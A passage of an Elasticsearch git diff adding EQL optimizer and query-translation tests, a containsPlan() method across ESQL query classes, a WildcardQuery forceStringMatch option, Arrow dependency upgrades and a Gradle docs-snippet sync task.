b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/optimizer/OptimizerTests.java @@ -12,6 +12,7 @@ import org.elasticsearch.xpack.eql.analysis.Analyzer; import org.elasticsearch.xpack.eql.analysis.PostAnalyzer; import org.elasticsearch.xpack.eql.analysis.PreAnalyzer; +import org.elasticsearch.xpack.eql.expression.function.scalar.string.StartsWith; import org.elasticsearch.xpack.eql.expression.function.scalar.string.ToString; import org.elasticsearch.xpack.eql.parser.EqlParser; import org.elasticsearch.xpack.eql.plan.logical.AbstractJoin; @@ -576,6 +577,113 @@ public void testQueryLevelTwoKeyConstraints() { assertEquals(ruleBCondition, filterCondition(query2.child().children().get(0))); } + /** + * sequence + * 1. filter startsWith(a, "foo") by a + * 2. filter X by a + * == + * 1. filter startsWith(a, "foo") by a + * 2. filter startsWith(a, "foo") by a + * \filter X + */ + public void testKeyConstraintWithFunction() { + Attribute a = key("a"); + + Expression keyCondition = startsWithExp(a, new Literal(EMPTY, "foo", DataTypes.KEYWORD)); + Expression filter = equalsExpression(); + + KeyedFilter rule1 = keyedFilter(basicFilter(keyCondition), a); + KeyedFilter rule2 = keyedFilter(basicFilter(filter), a); + + AbstractJoin j = randomSequenceOrSample(rule1, rule2); + + List queries = j.queries(); + assertEquals(rule1, queries.get(0)); + assertEquals(keyCondition, filterCondition(queries.get(1).child())); + assertEquals(filterCondition(rule2.child()), filterCondition(queries.get(1).child().children().get(0))); + } + + /** + * sequence + * 1. filter startsWith(a, b) by a + * 2. filter X by a + * == + * same + */ + public void testKeyConstraintWithNonKey() { + Attribute a = key("a"); + + Expression keyCondition = startsWithExp(a, key("b")); + Expression filter = equalsExpression(); + + KeyedFilter rule1 = keyedFilter(basicFilter(keyCondition), a); + KeyedFilter rule2 = keyedFilter(basicFilter(filter), a); + + AbstractJoin j = randomSequenceOrSample(rule1, rule2); + + List queries = j.queries(); + assertEquals(rule1, queries.get(0)); + assertEquals(rule2, queries.get(1)); + } + + /** + * sequence + * 1. filter startsWith(a, b) and c > 10 by a, c + * 2. filter X by a, c + * == + * 1. filter startsWith(a, b) and c > 10 by a, c + * 2. filter c > 10 by a, c + * \filter X + */ + public void testKeyConstraintWithNonKeyPartialPropagation() { + Attribute a = key("a"); + Attribute b = key("b"); + Attribute c = key("c"); + + GreaterThan gtExp = gtExpression(c); + Expression keyCondition = new And(EMPTY, startsWithExp(a, b), gtExp); + Expression filter = equalsExpression(); + + KeyedFilter rule1 = keyedFilter(basicFilter(keyCondition), a, c); + KeyedFilter rule2 = keyedFilter(basicFilter(filter), a, c); + + AbstractJoin j = randomSequenceOrSample(rule1, rule2); + + List queries = j.queries(); + assertEquals(rule1, queries.get(0)); + assertEquals(gtExp, filterCondition(queries.get(1).child())); + assertEquals(filterCondition(rule2.child()), filterCondition(queries.get(1).child().children().get(0))); + } + + /** + * sequence + * 1. filter startsWith(a, b) by a, c + * 2. filter X and c > 10 by a, c + * == + * 1. filter c > 10 by a, c + * \filter startsWith(a, b) + * 2. filter X and c > 10 by a, c + */ + public void testKeyConstraintWithNonKeyPartialReversePropagation() { + Attribute a = key("a"); + Attribute b = key("b"); + Attribute c = key("c"); + + GreaterThan gtExp = gtExpression(c); + Expression keyCondition = startsWithExp(a, b); + Expression filter = new And(EMPTY, equalsExpression(), gtExp); + + KeyedFilter rule1 = keyedFilter(basicFilter(keyCondition), a, c); + KeyedFilter rule2 = keyedFilter(basicFilter(filter), a, c); + + AbstractJoin j = randomSequenceOrSample(rule1, rule2); + + List queries = j.queries(); + assertEquals(gtExp, filterCondition(queries.get(0).child())); + assertEquals(filterCondition(rule1.child()), filterCondition(queries.get(0).child().children().get(0))); + assertEquals(rule2, queries.get(1)); + } + /** * Key conditions inside a disjunction (OR) are ignored *

@@ -817,4 +925,8 @@ private static Equals equalsExpression() { private static GreaterThan gtExpression(Attribute b) { return new GreaterThan(EMPTY, b, new Literal(EMPTY, 1, INTEGER), UTC); } + + private static StartsWith startsWithExp(Expression a, Expression b) { + return new StartsWith(EMPTY, a, b, randomBoolean()); + } } diff --git a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/planner/QueryTranslatorFailTests.java b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/planner/QueryTranslatorFailTests.java index e94f813a162f6..e67561962bc72 100644 --- a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/planner/QueryTranslatorFailTests.java +++ b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/planner/QueryTranslatorFailTests.java @@ -261,6 +261,17 @@ public void testSequenceWithTooLittleQueries() throws Exception { assertEquals("1:2: A sequence requires a minimum of 2 queries, found [1]", s); } + public void testSequenceWithTooLittleQueriesWithUntil() throws Exception { + String s = errorParsing("sequence [any where true] until [any where true]"); + assertEquals("1:2: A sequence requires a minimum of 2 queries (excluding UNTIL clause), found [1]", s); + plan("sequence [any where true] [any where true] until [any where true]"); + } + + public void testSequenceWithOnlyMissingEventsAndUntil() throws Exception { + String s = errorParsing("sequence with maxspan=1h ![process where true] until [process where true]"); + assertEquals("1:2: A sequence requires a minimum of 2 queries (excluding UNTIL clause), found [1]", s); + } + public void testSequenceWithIncorrectOption() throws Exception { EqlClientException e = expectThrows(EqlClientException.class, () -> plan("sequence [any where true] with repeat=123")); String msg = e.getMessage(); diff --git a/x-pack/plugin/eql/src/test/resources/querytranslator_tests.txt b/x-pack/plugin/eql/src/test/resources/querytranslator_tests.txt index 00c08096fd084..84ad63b964981 100644 --- a/x-pack/plugin/eql/src/test/resources/querytranslator_tests.txt +++ b/x-pack/plugin/eql/src/test/resources/querytranslator_tests.txt @@ -123,6 +123,90 @@ process where process_name in ("python.exe", "SMSS.exe", "explorer.exe") "terms":{"process_name":["python.exe","SMSS.exe","explorer.exe"], ; +mutipleOrEquals_As_InTranslation1 +process where process_name == "python.exe" or process_name == "SMSS.exe" or process_name == "explorer.exe" +; +"terms":{"process_name":["python.exe","SMSS.exe","explorer.exe"], +; + +multipleOrAndEquals_As_InTranslation +process where process_name == "python.exe" and process_name == "SMSS.exe" or process_name == "explorer.exe" or process_name == "test.exe" +; +{"bool":{"should":[{"bool":{"must":[{"term":{"process_name":{"value":"python.exe"}}},{"term":{"process_name":{"value":"SMSS.exe"}}}],"boost":1.0}},{"terms":{"process_name":["explorer.exe","test.exe"],"boost":1.0}}],"boost":1.0}} +; + +mutipleOrEquals_As_InTranslation2 +process where source_address == "123.12.1.1" or (opcode == 123 or opcode == 127) +; +{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"terms":{"opcode":[123,127],"boost":1.0}}],"boost":1.0}} +; + +mutipleOrEquals_As_InTranslation3 +process where (source_address == "123.12.1.1" or source_address == "127.0.0.1") and (opcode == 123 or opcode == 127) +; +{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"term":{"source_address":{"value":"127.0.0.1"}}}],"boost":1.0}},{"terms":{"opcode":[123,127],"boost":1.0}} +; + +mutipleOrEquals_As_InTranslation4 +process where (source_address == "123.12.1.1" or source_address == "127.0.0.1") and (opcode == 123 or opcode == 127) +; +"must":[{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"term":{"source_address":{"value":"127.0.0.1"}}}],"boost":1.0}},{"terms":{"opcode":[123,127],"boost":1.0}},{"term":{"event.category":{"value":"process"}}}] +; + +multipleOrIncompatibleTypes1 +process where process_name == "python.exe" or process_name == 2 or process_name == "3" +; +{"bool":{"should":[{"term":{"process_name":{"value":"python.exe"}}},{"term":{"process_name":{"value":2}}},{"term":{"process_name":{"value":"3"}}}],"boost":1.0}} +; + +multipleOrIncompatibleTypes2 +process where process_name == "1" or process_name == 2 or process_name == "3" +; +{"bool":{"should":[{"term":{"process_name":{"value":"1"}}},{"term":{"process_name":{"value":2}}},{"term":{"process_name":{"value":"3"}}}],"boost":1.0}} +; + +multipleOrIncompatibleTypes3 +process where process_name == 1.2 or process_name == 2 or process_name == "3" +; +{"bool":{"should":[{"term":{"process_name":{"value":1.2}}},{"term":{"process_name":{"value":2}}},{"term":{"process_name":{"value":"3"}}}],"boost":1.0}} +; + +// this query as an equivalent with +// process where process_name in (1.2, 2, 3) +// will result in a user error: 1st argument of [process_name in (1.2, 2, 3)] must be [keyword], found value [1.2] type [double] +multipleOrIncompatibleTypes4 +process where process_name == 1.2 or process_name == 2 or process_name == 3 +; +{"bool":{"should":[{"term":{"process_name":{"value":1.2}}},{"term":{"process_name":{"value":2}}},{"term":{"process_name":{"value":3}}}],"boost":1.0}} +; + +// this query as an equivalent with +// process where source_address in ("123.12.1.1", "123.12.1.2") +// will result in a user error: 1st argument of [source_address in ("123.12.1.1", "123.12.1.2")] must be [ip], found value ["123.12.1.1"] type [keyword] +multipleOrIncompatibleTypes5 +process where source_address == "123.12.1.1" or source_address == "123.12.1.2" +; +{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"term":{"source_address":{"value":"123.12.1.2"}}}],"boost":1.0}} +; + +multipleOrIncompatibleTypes6 +process where source_address == "123.12.1.1" or source_address == concat("123.12.","1.2") +; +{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"term":{"source_address":{"value":"123.12.1.2"}}}],"boost":1.0}} +; + +multipleOrIncompatibleTypes7 +process where source_address == "123.12.1.1" and (source_address == "123.12.1.2" or source_address >= "127.0.0.1") +; +"must":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.2"}}},{"range":{"source_address":{"gte":"127.0.0.1","boost":1.0}}}],"boost":1.0}},{"term":{"event.category":{"value":"process"}}}] +; + +multipleOrIncompatibleTypes8 +process where source_address == "123.12.1.1" and (source_address == "123.12.1.2" or source_address == "127.0.0.1") +; +"must":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.2"}}},{"term":{"source_address":{"value":"127.0.0.1"}}}],"boost":1.0}},{"term":{"event.category":{"value":"process"}}}] +; + inFilterWithScripting process where substring(command_line, 5) in ("test*","best") ; diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/AttributeSet.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/AttributeSet.java index d281db4e6bf63..fefaf3098319e 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/AttributeSet.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/AttributeSet.java @@ -261,5 +261,9 @@ public boolean isEmpty() { public AttributeSet build() { return new AttributeSet(mapBuilder.build()); } + + public void clear() { + mapBuilder.keySet().clear(); + } } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/Literal.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/Literal.java index 1bfb96a1b0f9d..d6f74144a9717 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/Literal.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/Literal.java @@ -6,7 +6,9 @@ */ package org.elasticsearch.xpack.esql.core.expression; +import org.apache.lucene.util.Accountable; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; @@ -35,7 +37,9 @@ /** * Literal or constant. */ -public class Literal extends LeafExpression { +public class Literal extends LeafExpression implements Accountable { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Literal.class); + public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( Expression.class, "Literal", @@ -169,6 +173,17 @@ public String nodeString() { return toString() + "[" + dataType + "]"; } + @Override + public long ramBytesUsed() { + long ramBytesUsed = BASE_RAM_BYTES_USED; + if (value instanceof BytesRef b) { + ramBytesUsed += b.length; + } else { + ramBytesUsed += RamUsageEstimator.sizeOfObject(value); + } + return ramBytesUsed; + } + /** * Utility method for creating a literal out of a foldable expression. * Throws an exception if the expression is not foldable. diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/AutomatonQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/AutomatonQuery.java deleted file mode 100644 index 343cabc6feea9..0000000000000 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/AutomatonQuery.java +++ /dev/null @@ -1,66 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ -package org.elasticsearch.xpack.esql.core.querydsl.query; - -import org.apache.lucene.util.automaton.Automaton; -import org.elasticsearch.index.query.AutomatonQueryBuilder; -import org.elasticsearch.index.query.QueryBuilder; -import org.elasticsearch.xpack.esql.core.tree.Source; - -import java.util.Objects; - -/** - * Query that matches documents based on a Lucene Automaton. - */ -public class AutomatonQuery extends Query { - - private final String field; - private final Automaton automaton; - private final String automatonDescription; - - public AutomatonQuery(Source source, String field, Automaton automaton, String automatonDescription) { - super(source); - this.field = field; - this.automaton = automaton; - this.automatonDescription = automatonDescription; - } - - public String field() { - return field; - } - - @Override - protected QueryBuilder asBuilder() { - return new AutomatonQueryBuilder(field, automaton, automatonDescription); - } - - @Override - public int hashCode() { - return Objects.hash(field, automaton, automatonDescription); - } - - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - - if (obj == null || getClass() != obj.getClass()) { - return false; - } - - AutomatonQuery other = (AutomatonQuery) obj; - return Objects.equals(field, other.field) - && Objects.equals(automaton, other.automaton) - && Objects.equals(automatonDescription, other.automatonDescription); - } - - @Override - protected String innerToString() { - return "AutomatonQuery{" + "field='" + field + '\'' + '}'; - } -} diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/BoolQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/BoolQuery.java index 2525eb8778488..ccea01378e6bd 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/BoolQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/BoolQuery.java @@ -100,4 +100,14 @@ public Query negate(Source source) { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + for (Query q : queries) { + if (q.containsPlan()) { + return true; + } + } + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/ExistsQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/ExistsQuery.java index 42876f2a7ead3..5bad8d60a4db9 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/ExistsQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/ExistsQuery.java @@ -29,4 +29,9 @@ protected QueryBuilder asBuilder() { protected String innerToString() { return name; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/GeoDistanceQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/GeoDistanceQuery.java index f0806660c3f7a..1a15c28fc89a5 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/GeoDistanceQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/GeoDistanceQuery.java @@ -75,4 +75,9 @@ public boolean equals(Object obj) { protected String innerToString() { return field + ":" + "(" + distance + "," + "(" + lat + ", " + lon + "))"; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/MatchAll.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/MatchAll.java index 3a868349a183d..76bc291dab651 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/MatchAll.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/MatchAll.java @@ -25,4 +25,9 @@ protected QueryBuilder asBuilder() { protected String innerToString() { return ""; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/NotQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/NotQuery.java index 1a37fc8f42b9a..c62f54ea99693 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/NotQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/NotQuery.java @@ -59,4 +59,9 @@ protected String innerToString() { public Query negate(Source source) { return child; } + + @Override + public boolean containsPlan() { + return child.containsPlan(); + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/PrefixQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/PrefixQuery.java index ede4aee3d117e..628a38f9cace0 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/PrefixQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/PrefixQuery.java @@ -61,4 +61,9 @@ public boolean equals(Object obj) { protected String innerToString() { return field + ":" + query; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/Query.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/Query.java index 456275a054899..0b17f1b16b4af 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/Query.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/Query.java @@ -70,6 +70,12 @@ public final QueryBuilder toQueryBuilder() { */ protected abstract String innerToString(); + /** + * Does the result of calling {@link #asBuilder()} need the plan + * to serialize itself? + */ + public abstract boolean containsPlan(); + @Override public boolean equals(Object obj) { if (obj == null || obj.getClass() != getClass()) { diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/QueryStringQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/QueryStringQuery.java index 3a125f87254bd..14c32cd97b236 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/QueryStringQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/QueryStringQuery.java @@ -137,4 +137,9 @@ protected String innerToString() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RangeQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RangeQuery.java index e7ddfd1735b28..7f8bcc3c34a47 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RangeQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RangeQuery.java @@ -118,4 +118,9 @@ public boolean equals(Object obj) { protected String innerToString() { return field + ":" + (includeLower ? "[" : "(") + lower + ", " + upper + (includeUpper ? "]" : ")") + "@" + zoneId.getId(); } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RegexQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RegexQuery.java index b12802de4e715..0669039cde9c1 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RegexQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/RegexQuery.java @@ -69,4 +69,9 @@ public boolean equals(Object obj) { protected String innerToString() { return field + "~ /" + regex + "/"; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermQuery.java index 03c3b29ba15ec..040083fe3d1d7 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermQuery.java @@ -91,4 +91,9 @@ protected String innerToString() { public boolean scorable() { return scorable; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermsQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermsQuery.java index 68f8dd711f87a..ae1ff0f74c409 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermsQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/TermsQuery.java @@ -53,4 +53,9 @@ public boolean equals(Object obj) { protected String innerToString() { return term + ":" + values; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/WildcardQuery.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/WildcardQuery.java index 03d819cf7aa9b..e64f5f5652027 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/WildcardQuery.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/querydsl/query/WildcardQuery.java @@ -12,22 +12,18 @@ import java.util.Objects; -import static org.elasticsearch.index.query.QueryBuilders.wildcardQuery; - public class WildcardQuery extends Query { private final String field, query; private final boolean caseInsensitive; + private final boolean forceStringMatch; - public WildcardQuery(Source source, String field, String query) { - this(source, field, query, false); - } - - public WildcardQuery(Source source, String field, String query, boolean caseInsensitive) { + public WildcardQuery(Source source, String field, String query, boolean caseInsensitive, boolean forceStringMatch) { super(source); this.field = field; this.query = query; this.caseInsensitive = caseInsensitive; + this.forceStringMatch = forceStringMatch; } public String field() { @@ -44,14 +40,14 @@ public Boolean caseInsensitive() { @Override protected QueryBuilder asBuilder() { - WildcardQueryBuilder wb = wildcardQuery(field, query); + WildcardQueryBuilder wb = new WildcardQueryBuilder(field, query, forceStringMatch); // ES does not allow case_insensitive to be set to "false", it should be either "true" or not specified return caseInsensitive == false ? wb : wb.caseInsensitive(caseInsensitive); } @Override public int hashCode() { - return Objects.hash(field, query, caseInsensitive); + return Objects.hash(field, query, caseInsensitive, forceStringMatch); } @Override @@ -67,11 +63,17 @@ public boolean equals(Object obj) { WildcardQuery other = (WildcardQuery) obj; return Objects.equals(field, other.field) && Objects.equals(query, other.query) - && Objects.equals(caseInsensitive, other.caseInsensitive); + && Objects.equals(caseInsensitive, other.caseInsensitive) + && Objects.equals(forceStringMatch, other.forceStringMatch); } @Override protected String innerToString() { return field + ":" + query; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql-core/src/test/java/org/elasticsearch/xpack/esql/core/querydsl/query/LeafQueryTests.java b/x-pack/plugin/esql-core/src/test/java/org/elasticsearch/xpack/esql/core/querydsl/query/LeafQueryTests.java index d0aa9bd073ec8..5f6632eb7ba31 100644 --- a/x-pack/plugin/esql-core/src/test/java/org/elasticsearch/xpack/esql/core/querydsl/query/LeafQueryTests.java +++ b/x-pack/plugin/esql-core/src/test/java/org/elasticsearch/xpack/esql/core/querydsl/query/LeafQueryTests.java @@ -31,6 +31,11 @@ protected QueryBuilder asBuilder() { protected String innerToString() { return ""; } + + @Override + public boolean containsPlan() { + return false; + } } public void testEqualsAndHashCode() { diff --git a/x-pack/plugin/esql/arrow/build.gradle b/x-pack/plugin/esql/arrow/build.gradle index fac0bd0a77452..d6fa48982d029 100644 --- a/x-pack/plugin/esql/arrow/build.gradle +++ b/x-pack/plugin/esql/arrow/build.gradle @@ -12,9 +12,9 @@ dependencies { compileOnly project(':x-pack:plugin:esql:compute') compileOnly project(':x-pack:plugin:esql-core') compileOnly project(':x-pack:plugin:mapper-version') - implementation('org.apache.arrow:arrow-vector:16.1.0') - implementation('org.apache.arrow:arrow-format:16.1.0') - implementation('org.apache.arrow:arrow-memory-core:16.1.0') + implementation('org.apache.arrow:arrow-vector:18.3.0') + implementation('org.apache.arrow:arrow-format:18.3.0') + implementation('org.apache.arrow:arrow-memory-core:18.3.0') implementation('org.checkerframework:checker-qual:3.42.0') implementation('com.google.flatbuffers:flatbuffers-java:23.5.26') // Needed for the json arrow serialization, and loaded even if we don't use it. @@ -25,7 +25,7 @@ dependencies { runtimeOnly "org.slf4j:slf4j-nop:${versions.slf4j}" testImplementation project(':test:framework') - testImplementation('org.apache.arrow:arrow-memory-unsafe:16.1.0') + testImplementation('org.apache.arrow:arrow-memory-unsafe:18.3.0') testImplementation("com.fasterxml.jackson.datatype:jackson-datatype-jsr310:${versions.jackson}") } @@ -38,18 +38,8 @@ tasks.named("dependencyLicenses").configure { tasks.named("thirdPartyAudit").configure { ignoreViolations( // uses sun.misc.Unsafe. Only used in tests. - 'org.apache.arrow.memory.util.hash.SimpleHasher', - 'org.apache.arrow.memory.util.hash.MurmurHasher', 'org.apache.arrow.memory.util.MemoryUtil', 'org.apache.arrow.memory.util.MemoryUtil$1', - 'org.apache.arrow.vector.DecimalVector', - 'org.apache.arrow.vector.BaseFixedWidthVector', - 'org.apache.arrow.vector.util.DecimalUtility', - 'org.apache.arrow.vector.Decimal256Vector', - 'org.apache.arrow.vector.util.VectorAppender', - 'org.apache.arrow.memory.ArrowBuf', - 'org.apache.arrow.vector.BitVectorHelper', - 'org.apache.arrow.memory.util.ByteFunctionHelpers', ) ignoreMissingClasses( 'org.apache.commons.codec.binary.Hex' diff --git a/x-pack/plugin/esql/build.gradle b/x-pack/plugin/esql/build.gradle index 0db0e558cd147..447ceb53489f2 100644 --- a/x-pack/plugin/esql/build.gradle +++ b/x-pack/plugin/esql/build.gradle @@ -226,6 +226,47 @@ tasks.named("test").configure { } } +// This is similar to the test task above, but needed for the LookupJoinTypesIT which runs in the internalClusterTest task +// and generates a types table for the LOOKUP JOIN command. It is possible in future we might have move tests that do this. +tasks.named("internalClusterTest").configure { + if (buildParams.ci == false) { + systemProperty 'generateDocs', true + def injected = project.objects.newInstance(Injected) + // Define the folder to delete and recreate + def tempDir = file("build/testrun/internalClusterTest/temp/esql") + doFirst { + injected.fs.delete { + it.delete(tempDir) + } + // Re-create this folder so we can save a table of generated examples to extract from csv-spec tests + tempDir.mkdirs() // Recreate the folder + } + File snippetsFolder = file("build/testrun/internalClusterTest/temp/esql/_snippets") + def snippetsDocFolder = file("${rootDir}/docs/reference/query-languages/esql/_snippets") + def snippetsTree = fileTree(snippetsFolder).matching { + include "**/types/*.md" // Recursively include all types/*.md files (effectively counting functions and operators) + } + + doLast { + def snippets = snippetsTree.files.collect { it.name } + int countSnippets = snippets.size() + if (countSnippets == 0) { + logger.quiet("ESQL Docs: No function/operator snippets created. Skipping sync.") + } else { + logger.quiet("ESQL Docs: Found $countSnippets generated function/operator snippets to patch into docs") + injected.fs.sync { + from snippetsFolder + into snippetsDocFolder + include '**/*.md' + preserve { + include '**/*.md' + } + } + } + } + } +} + /**************************************************************** * Enable QA/rest integration tests for snapshot builds only * * TODO: Enable for all builds upon this feature release * diff --git a/x-pack/plugin/esql/compute/build.gradle b/x-pack/plugin/esql/compute/build.gradle index 66867ae668fcc..5724b129efd16 100644 --- a/x-pack/plugin/esql/compute/build.gradle +++ b/x-pack/plugin/esql/compute/build.gradle @@ -3,6 +3,7 @@ import org.elasticsearch.gradle.internal.util.SourceDirectoryCommandLineArgument apply plugin: 'elasticsearch.build' apply plugin: 'elasticsearch.string-templates' apply plugin: 'elasticsearch.publish' +apply plugin: 'elasticsearch.transport-version-references' base { archivesName = 'x-pack-esql-compute' diff --git a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/ConvertEvaluatorImplementer.java b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/ConvertEvaluatorImplementer.java index 2e43886b04929..091b5c9d2fdcb 100644 --- a/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/ConvertEvaluatorImplementer.java +++ b/x-pack/plugin/esql/compute/gen/src/main/java/org/elasticsearch/compute/gen/ConvertEvaluatorImplementer.java @@ -23,6 +23,7 @@ import javax.lang.model.type.TypeMirror; import javax.lang.model.util.Elements; +import static org.elasticsearch.compute.gen.EvaluatorImplementer.baseRamBytesUsed; import static org.elasticsearch.compute.gen.Methods.buildFromFactory; import static 